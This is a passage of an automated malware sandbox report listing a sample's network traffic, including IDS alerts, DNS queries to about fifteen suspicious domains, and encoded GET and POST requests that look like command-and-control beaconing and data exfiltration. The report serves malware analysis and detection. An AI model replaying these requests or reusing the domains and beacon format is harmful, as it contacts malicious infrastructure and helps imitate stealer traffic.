    Source: Joe Sandbox ViewASN Name: RU-CENTERRU RU-CENTERRU
    Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
    Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49727
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49940
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 13 Nov 2024 14:36:40 GMTserver: Apacheset-cookie: __tad=1731508600.3861162; expires=Sat, 11-Nov-2034 14:36:40 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 57 15 20 b5 71 38 20 21 81 38 a0 5d 38 23 af 33 69 bc 9b d8 c1 9e b6 54 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 3f 49 dc aa 9d 3a 45 53 08 5e cb 54 dc 06 d1 18 bb 41 3f 78 63 49 18 d3 60 d1 1b 5b dc 86 b4 2a c5 09 fb 52 aa 2a d9 29 0f 1e 6b e3 51 d3 f7 ce d8 3b 90 90 b5 44 c3 4a 88 fd 7e 5f 3c a9 13 c3 f2 12 c5 bb 6c 9d 24 42 c0 35 12 28 20 d3 a3 db 12 b8 06 96 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 f8 13 f5 96 90 81 0f 25 c0 34 40 2d c2 33 e5 30 78 d7 9b c0 31 65 ba 00 8d f3 10 5c 8f 4c 51 c1 d9 a4 d9 5a 4d c6 59 3e ee ba 1b a5 ef ae a6 54 f9 1c ee 93 d9 de d8 da ed 8b ce 69 15 51 85 c7 a1 53 1a f3 df 3c 9d 67 cd 20 2f de 66 f3 75 72 4c 12 f2 87 c8 64 95 81 c0 d7 fe eb 64 42 42 40 9a 36 f9 9f d5 5e 45 83 cc 9f c5 86 35 c3 97 49 b3 84 0f 4f 4e 3e 5d b3 0e 55 e7 f7 bd b3 86 1c 87 36 ab 28 3b e0 31 32 1f 59 c9 6c 56 70 13 6c de 0c 20 2b ce 56 6c 90 ed cc 1f e3 fc 32 f3 18 b6 1d c5 f3 7b 88 fb a9 b0 8f 3a a3 9d ec fc 84 28 76 26 c4 62 1f eb f5 08 d3 1d aa 07 4b f9 93 bb f9 e9 f4 ff da 15 cb 8c 84 a8 fb 08 8c d5 6d 8e de 8f 1d ff fb 3b 8c 5d 7d 3e 72 74 e0 29 86 1b 57 73 a3 21 62 37 de 6d 6d bd 3a bb 5c 5c ea e5 1b 38 02 a3 47 10 d3 a6 cb 30 a2 6f 36 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac 7a df 19 7d 07 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 c7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 ed ea b3 7c a9 ea eb 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 88 90 26 13 1c 04 00 00 Data Ascii: TM0=7b=$qW q8 !8]8#3iTwiX|I<~o8eK}W%eU6nKq$etP?I:ES^TA?xcI`[*R*)kQ;DJ~_<l$B5( F{P;[ %4@-30x1e\LQZMY>TiQS<g /furLddBB@6^E5ION>]U6(;12YlVpl +Vl2{:(v&bKm;]}>rt)Ws!b7mm:\\8G0o6uWqbykY\&RA8z}-zR(8X7){$N/dm<@D.|x/hy@+&
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 13 Nov 2024 14:36:43 GMTserver: Apacheset-cookie: __tad=1731508603.5858274; expires=Sat, 11-Nov-2034 14:36:43 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 57 15 20 b5 71 38 20 21 81 38 a0 5d 38 23 af 33 69 bc 9b d8 c1 9e b6 54 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 3f 49 dc aa 9d 3a 45 53 08 5e cb 54 dc 06 d1 18 bb 41 3f 78 63 49 18 d3 60 d1 1b 5b dc 86 b4 2a c5 09 fb 52 aa 2a d9 29 0f 1e 6b e3 51 d3 f7 ce d8 3b 90 90 b5 44 c3 4a 88 fd 7e 5f 3c a9 13 c3 f2 12 c5 bb 6c 9d 24 42 c0 35 12 28 20 d3 a3 db 12 b8 06 96 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 f8 13 f5 96 90 81 0f 25 c0 34 40 2d c2 33 e5 30 78 d7 9b c0 31 65 ba 00 8d f3 10 5c 8f 4c 51 c1 d9 a4 d9 5a 4d c6 59 3e ee ba 1b a5 ef ae a6 54 f9 1c ee 93 d9 de d8 da ed 8b ce 69 15 51 85 c7 a1 53 1a f3 df 3c 9d 67 cd 20 2f de 66 f3 75 72 4c 12 f2 87 c8 64 95 81 c0 d7 fe eb 64 42 42 40 9a 36 f9 9f d5 5e 45 83 cc 9f c5 86 35 c3 97 49 b3 84 0f 4f 4e 3e 5d b3 0e 55 e7 f7 bd b3 86 1c 87 36 ab 28 3b e0 31 32 1f 59 c9 6c 56 70 13 6c de 0c 20 2b ce 56 6c 90 ed cc 1f e3 fc 32 f3 18 b6 1d c5 f3 7b 88 fb a9 b0 8f 3a a3 9d ec fc 84 28 76 26 c4 62 1f eb f5 08 d3 1d aa 07 4b f9 93 bb f9 e9 f4 ff da 15 cb 8c 84 a8 fb 08 8c d5 6d 8e de 8f 1d ff fb 3b 8c 5d 7d 3e 72 74 e0 29 86 1b 57 73 a3 21 62 37 de 6d 6d bd 3a bb 5c 5c ea e5 1b 38 02 a3 47 10 d3 a6 cb 30 a2 6f 36 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac 7a df 19 7d 07 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 c7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 ed ea b3 7c a9 ea eb 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 88 90 26 13 1c 04 00 00 Data Ascii: TM0=7b=$qW q8 !8]8#3iTwiX|I<~o8eK}W%eU6nKq$etP?I:ES^TA?xcI`[*R*)kQ;DJ~_<l$B5( F{P;[ %4@-30x1e\LQZMY>TiQS<g /furLddBB@6^E5ION>]U6(;12YlVpl +Vl2{:(v&bKm;]}>rt)Ws!b7mm:\\8G0o6uWqbykY\&RA8z}-zR(8X7){$N/dm<@D.|x/hy@+&
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 13 Nov 2024 14:36:46 GMTserver: Apacheset-cookie: __tad=1731508606.5697575; expires=Sat, 11-Nov-2034 14:36:46 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 57 15 20 b5 71 38 20 21 81 38 a0 5d 38 23 af 33 69 bc 9b d8 c1 9e b6 54 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 3f 49 dc aa 9d 3a 45 53 08 5e cb 54 dc 06 d1 18 bb 41 3f 78 63 49 18 d3 60 d1 1b 5b dc 86 b4 2a c5 09 fb 52 aa 2a d9 29 0f 1e 6b e3 51 d3 f7 ce d8 3b 90 90 b5 44 c3 4a 88 fd 7e 5f 3c a9 13 c3 f2 12 c5 bb 6c 9d 24 42 c0 35 12 28 20 d3 a3 db 12 b8 06 96 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 f8 13 f5 96 90 81 0f 25 c0 34 40 2d c2 33 e5 30 78 d7 9b c0 31 65 ba 00 8d f3 10 5c 8f 4c 51 c1 d9 a4 d9 5a 4d c6 59 3e ee ba 1b a5 ef ae a6 54 f9 1c ee 93 d9 de d8 da ed 8b ce 69 15 51 85 c7 a1 53 1a f3 df 3c 9d 67 cd 20 2f de 66 f3 75 72 4c 12 f2 87 c8 64 95 81 c0 d7 fe eb 64 42 42 40 9a 36 f9 9f d5 5e 45 83 cc 9f c5 86 35 c3 97 49 b3 84 0f 4f 4e 3e 5d b3 0e 55 e7 f7 bd b3 86 1c 87 36 ab 28 3b e0 31 32 1f 59 c9 6c 56 70 13 6c de 0c 20 2b ce 56 6c 90 ed cc 1f e3 fc 32 f3 18 b6 1d c5 f3 7b 88 fb a9 b0 8f 3a a3 9d ec fc 84 28 76 26 c4 62 1f eb f5 08 d3 1d aa 07 4b f9 93 bb f9 e9 f4 ff da 15 cb 8c 84 a8 fb 08 8c d5 6d 8e de 8f 1d ff fb 3b 8c 5d 7d 3e 72 74 e0 29 86 1b 57 73 a3 21 62 37 de 6d 6d bd 3a bb 5c 5c ea e5 1b 38 02 a3 47 10 d3 a6 cb 30 a2 6f 36 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac 7a df 19 7d 07 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 c7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 ed ea b3 7c a9 ea eb 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 88 90 26 13 1c 04 00 00 Data Ascii: TM0=7b=$qW q8 !8]8#3iTwiX|I<~o8eK}W%eU6nKq$etP?I:ES^TA?xcI`[*R*)kQ;DJ~_<l$B5( F{P;[ %4@-30x1e\LQZMY>TiQS<g /furLddBB@6^E5ION>]U6(;12YlVpl +Vl2{:(v&bKm;]}>rt)Ws!b7mm:\\8G0o6uWqbykY\&RA8z}-zR(8X7){$N/dm<@D.|x/hy@+&
    Source: global trafficHTTP traffic detected: GET /7d81/?tXul=U2UloNhP&2J=rKnERuK87XwUpD46DfVgxrQvP3X7K9CGfDS22ViQ9f8p4xS2+clAvvHEJpZ8brBpsNS/kiukCkSqLcZJlXQs2/1YcKhhRt4ykNxCPrZ76z98Hxh/ipFlCU6POWu6VKl5iw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.bahaeng.comConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /ovl0/?2J=sybLtbK8r4s7cIP4xvr2i1/OgqOaozXkrfvLrO0saE7+04sBLyNlnPJsxyiJd448I0Eq3D8MalhBXQ7UwGRoDb3Yk8LIhQCUInzvAK5ePNY01KNz5a/RKEGS8umzny51vQ==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.atendefacil.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /j4lg/?tXul=U2UloNhP&2J=0mGuP4ABjbamojwwbGp4nd6DYCnF1PU82/RCQVDltajJwR32joy3yBdZ/4cT/JAxhTejF9/1KOpXB+u6q5pZeVP3rEdsFeaB8jVGPWY7QM3+gMMl8rd3lPw1Ny+3a69apQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.sklad-iq.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /a4nt/?2J=Y8ucfnop1/b3pfYFq01F/gO8ESspnEO25i/hccpQHURd3Ee6lJ0YewpZ26P6KIWp1n+YeG7L7VclPhA1nqTCAuTU030Z3lnUxyF2WW91OhunyyCxSBLPY4XFmWmPj9k/og==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.mdpc7.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /uaef/?2J=znvVMZI6wclGwSNQgZtr5fBMguex2NmDUWcQCD5rzoJFeirSAcNEfn/4jSETcpej++6Zf7EsBdpUeNRucPEp0Vp7Iz2INonuboPmggNf5Eh/heiOubkxKPwt67wGlkSjkQ==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.ecojomos.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /k81y/?2J=ijzO5vt4Wia988ezl94/5B5fhr01XtFEJs702F2lFCeAUQR2wSJY5h+0sGUliGD5vvb7tm1pzcvQX+qpOWiQ3K4hemU8wbaBHwJuA5BCX/yteUBDcWPxvtRpccaohSYfjw==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.717hy.netConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /i6b4/?2J=rbSOGHQf+oAIPcBZM/BWO4v0sc0ZI7pa6YU0oIiGfR+Ewkw1zlM3KmPagJJbTGfXhG2rczLZFwuqulMMl1sHkUxyatg9ogB88gOJZKl7SEK9bLYaCAnWqdxVYxi0oqyA/g==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.mrpokrovskii.proConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /ocnr/?2J=6FyD7uZOrviJgscx3zDo9l3wDpxd2lbJ6NQik1x0LfmClWpek8Fmgw2VUsZOzaCZ8a9BTDMjp2431cAe4Zlp/DG/ZAZ2b2TXHQALvARevfDq7KvJw4eUAghtZHK7htMeug==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.7vh2wy.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /b9df/?2J=dUH3FVfSLAHIHBRMvvPQgLWf0KXIT0dr2Awu2k06qg9LbooImE5C092/euUAt8NBFlVUBHDmvHBa3+G+T/z9BT74tEsDe+Pl6mU5GIhBpG7WZgGiesGf3hUVa6du6lWzSg==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.lsfanarolt.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /jj95/?2J=Pexrq8dBT+pohtdREgLaj2qM8aDHNwg4eoWqtxa3tUqS44OvUmk7LsvxHK5YH7fdz4458FvKpzVKrVQ2/F68/gTe2ya6Lr7IE54iaP1hci4bc8/+8Y3du4MuylwBJQVzoQ==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.129glenforest.comConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.madhf.techConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGbhDcZOCNwErTQXryorxHC4PkDe5WJpFvO4SjuRTQ+4P0+jcQZ5F9wjze3RXp2BxR3tkOJaw==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.grandesofertas.funConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /p9qy/?2J=szOnwbI0B7M9cMMwX4bDwuNgoUWUV7slIpLLNm8Tfpa5tKMeNeGfvlEASyf1bFN7LlEkU7ntq56NwT9FzvKbuwV8GB1U7lwGbSSnMTrnLCsmtu5+GLJZif51cB3zkwMvhA==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.sankan-fukushi.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /7arg/?2J=yBRFulyn6SusKZ+jwFF1qQiDnRV1yVxCYcOxd6ADnBv0QCWFr3q/C42N2s59F8UA9Wb/HU1T/Yso8my7bN9/45XMMrsG9LzPDXPeB6BMAupShH8CXHTl1JaA/+QsUvuMTg==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.rtpwslot888gol.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficDNS traffic detected: DNS query: www.bahaeng.com
    Source: global trafficDNS traffic detected: DNS query: www.atendefacil.info
    Source: global trafficDNS traffic detected: DNS query: www.sklad-iq.online
    Source: global trafficDNS traffic detected: DNS query: www.mdpc7.top
    Source: global trafficDNS traffic detected: DNS query: www.ecojomos.xyz
    Source: global trafficDNS traffic detected: DNS query: www.717hy.net
    Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
    Source: global trafficDNS traffic detected: DNS query: www.7vh2wy.top
    Source: global trafficDNS traffic detected: DNS query: www.lsfanarolt.shop
    Source: global trafficDNS traffic detected: DNS query: www.129glenforest.com
    Source: global trafficDNS traffic detected: DNS query: www.joube.shop
    Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
    Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
    Source: global trafficDNS traffic detected: DNS query: www.sankan-fukushi.info
    Source: global trafficDNS traffic detected: DNS query: www.rtpwslot888gol.sbs
    Source: unknownHTTP traffic detected: POST /ovl0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.atendefacil.infoOrigin: http://www.atendefacil.infoReferer: http://www.atendefacil.info/ovl0/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6Data Raw: 32 4a 3d 68 77 7a 72 75 72 2b 31 32 62 4a 72 43 38 66 32 37 4b 48 4c 76 79 43 64 77 49 2f 35 6d 52 2f 62 6b 62 58 67 73 74 59 72 58 30 71 39 77 59 30 4c 4a 46 5a 69 6c 50 6c 4b 33 6c 43 43 65 4b 6b 43 45 52 38 77 33 6b 4d 35 4c 33 59 4f 43 51 57 4f 35 45 5a 42 57 62 2f 6d 68 75 50 54 71 41 75 43 50 31 69 4b 42 49 6c 30 47 75 6b 7a 68 37 38 44 6c 5a 44 68 41 6d 32 41 38 38 4c 31 76 54 4d 79 74 74 38 41 78 64 62 50 35 71 51 4f 75 6c 41 78 53 2b 4f 45 79 72 4d 2b 4f 42 6d 76 59 63 55 70 4b 4c 7a 48 4d 5a 48 77 6e 78 6a 59 7a 5a 4a 44 53 46 4a 45 66 6d 69 69 78 66 6c 6e 39 68 59 2f 46 71 7a 41 68 58 4d 3d Data Ascii: 2J=hwzrur+12bJrC8f27KHLvyCdwI/5mR/bkbXgstYrX0q9wY0LJFZilPlK3lCCeKkCER8w3kM5L3YOCQWO5EZBWb/mhuPTqAuCP1iKBIl0Gukzh78DlZDhAm2A88L1vTMytt8AxdbP5qQOulAxS+OEyrM+OBmvYcUpKLzHMZHwnxjYzZJDSFJEfmiixfln9hY/FqzAhXM=
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:34:23 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:34:23 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:34:23 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 